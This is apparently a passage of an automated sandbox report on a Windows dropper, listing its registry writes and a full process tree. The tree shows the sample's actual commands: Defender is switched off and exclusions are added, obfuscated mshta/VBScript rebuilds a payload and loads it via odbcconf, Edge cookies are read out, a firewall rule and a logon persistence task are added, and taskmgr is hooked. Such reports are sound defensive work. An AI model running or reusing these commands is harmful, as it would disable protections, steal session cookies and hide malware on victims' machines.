| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133755357888036950" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15a8461882.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15635943177.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun154ca5fada.exe /mixtwo
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun157e7a96e632.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15168f90478cc7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15591a43f8a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1580e9cd8c23e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15372e8db79ed3d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15b94526a807b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1500b8e65c1f53.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15132bf2c585337a0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun150e9a93676ff.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15c4c762b69ba5.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun157e7a96e632.exe
Sun157e7a96e632.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1524d92394d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun156aa32cae4a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15e81af69f990d3a6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1515dbfc0edab0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1585e1028b0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun156d9ca8467.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1507dd11d509.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15591a43f8a.exe
Sun15591a43f8a.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1507dd11d509.exe
Sun1507dd11d509.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15635943177.exe
Sun15635943177.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe
Sun15a8461882.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15372e8db79ed3d.exe
Sun15372e8db79ed3d.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156aa32cae4a.exe
Sun156aa32cae4a.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun154ca5fada.exe
Sun154ca5fada.exe /mixtwo
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun150e9a93676ff.exe
Sun150e9a93676ff.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15168f90478cc7.exe
Sun15168f90478cc7.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15c4c762b69ba5.exe
Sun15c4c762b69ba5.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15b94526a807b.exe
Sun15b94526a807b.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1580e9cd8c23e.exe
Sun1580e9cd8c23e.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15132bf2c585337a0.exe
Sun15132bf2c585337a0.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15e81af69f990d3a6.exe
Sun15e81af69f990d3a6.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1515dbfc0edab0.exe
Sun1515dbfc0edab0.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1585e1028b0.exe
Sun1585e1028b0.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1524d92394d.exe
Sun1524d92394d.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156d9ca8467.exe
Sun156d9ca8467.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1507dd11d509.exe
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1507dd11d509.exe
C:\Users\Admin\AppData\Local\Temp\is-0F5D4.tmp\Sun15b94526a807b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0F5D4.tmp\Sun15b94526a807b.tmp" /SL5="$6021A,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15b94526a807b.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 232 -ip 232
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCriPT: ClOsE(cReateoBJeCT ( "wsCRipT.shell"). RUN("cMd.ExE /q /R TyPe ""C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15635943177.exe"" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if """"== """" for %i iN (""C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15635943177.exe"" ) do taskkill /f -im ""%~Nxi"" ", 0 ,trUe ) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4324 -ip 4324
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 232 -s 408
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 408
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156d9ca8467.exe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If """" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156d9ca8467.exe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15b94526a807b.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15b94526a807b.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-JE0HU.tmp\Sun15b94526a807b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JE0HU.tmp\Sun15b94526a807b.tmp" /SL5="$30242,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15b94526a807b.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /R TyPe "C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15635943177.exe" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if ""== "" for %i iN ("C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15635943177.exe") do taskkill /f -im "%~Nxi"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156d9ca8467.exe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156d9ca8467.exe" ) do taskkill -f /Im "%~NXg"
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun157e7a96e632.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun157e7a96e632.exe" -u
C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe
..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi
C:\Windows\SysWOW64\taskkill.exe
taskkill /f -im "Sun15635943177.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCriPT: ClOsE(cReateoBJeCT ( "wsCRipT.shell"). RUN("cMd.ExE /q /R TyPe ""C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe"" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if ""-PS7ykUulCvwqoVkaBFLeqX_1Bi ""== """" for %i iN (""C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe"" ) do taskkill /f -im ""%~Nxi"" ", 0 ,trUe ) )
C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe
Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2244 -ip 2244
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /R TyPe "C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if "-PS7ykUulCvwqoVkaBFLeqX_1Bi "== "" for %i iN ("C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe") do taskkill /f -im "%~Nxi"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If ""-PJJdHOofvf~E"" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 356
C:\Windows\SysWOW64\taskkill.exe
taskkill -f /Im "Sun156d9ca8467.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "-PJJdHOofvf~E" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" ) do taskkill -f /Im "%~NXg"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCrIPT: ClOSE (CReaTeobjECt ( "wsCRIPt.ShelL" ). run ( "cmd.EXe /R EChO 0%timE%tQM> rHUir.hh & EcHO | SeT /p = ""MZ"" > PCN3bFXS.F& copy /b /y Pcn3bFXS.F + 16AqXIX.Y + lSIVmd4C.I + VbVS~Fi.ZD+rhUIr.hh ..\JEnnF1QU.UEN & sTART odbcconf.exe /A { regsVR ..\JeNnF1QU.UEN } & deL /Q * ",0 ,TRUe ))
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBScRIpt: close (crEateoBJeCT("wscRIpT.sHELl"). RUn ( "C:\Windows\system32\cmd.exe /q /C ECho | SeT /p = ""MZ"" > 2MXG5k.pR & copy /b /y 2MXG5K.pR + A0kCLvIX.Kc + SpiKDP6.H + ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku } " ,0 , TrUE ) )
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C ECho | SeT /p = "MZ" > 2MXG5k.pR © /b /y 2MXG5K.pR +A0kCLvIX.Kc +SpiKDP6.H+ ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R EChO 0%timE%tQM> rHUir.hh & EcHO | SeT /p = "MZ" > PCN3bFXS.F& copy /b /y Pcn3bFXS.F+ 16AqXIX.Y+ lSIVmd4C.I+ VbVS~Fi.ZD+rhUIr.hh ..\JEnnF1QU.UEN & sTART odbcconf.exe /A { regsVR ..\JeNnF1QU.UEN } & deL /Q *
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECho "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>2MXG5k.pR"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>PCN3bFXS.F"
C:\Windows\SysWOW64\odbcconf.exe
odbcconf.exe /a { reGSVr .\9v~4.Ku}
C:\Windows\SysWOW64\odbcconf.exe
odbcconf.exe /A { regsVR ..\JeNnF1QU.UEN }
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffaaaffcc40,0x7ffaaaffcc4c,0x7ffaaaffcc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1888 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2128,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2140 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2192,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2564 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3056,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3084 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3088,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3124 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4440,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4464 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4168,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4328 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4336,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3676 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4936,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4964 /prefetch:8
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5220,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5232 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1585e1028b0.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1585e1028b0.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /306-306
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4672 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5228,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4696 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5332 /prefetch:8
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4768,i,2128252167996546344,1334598127593173198,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5232 /prefetch:8
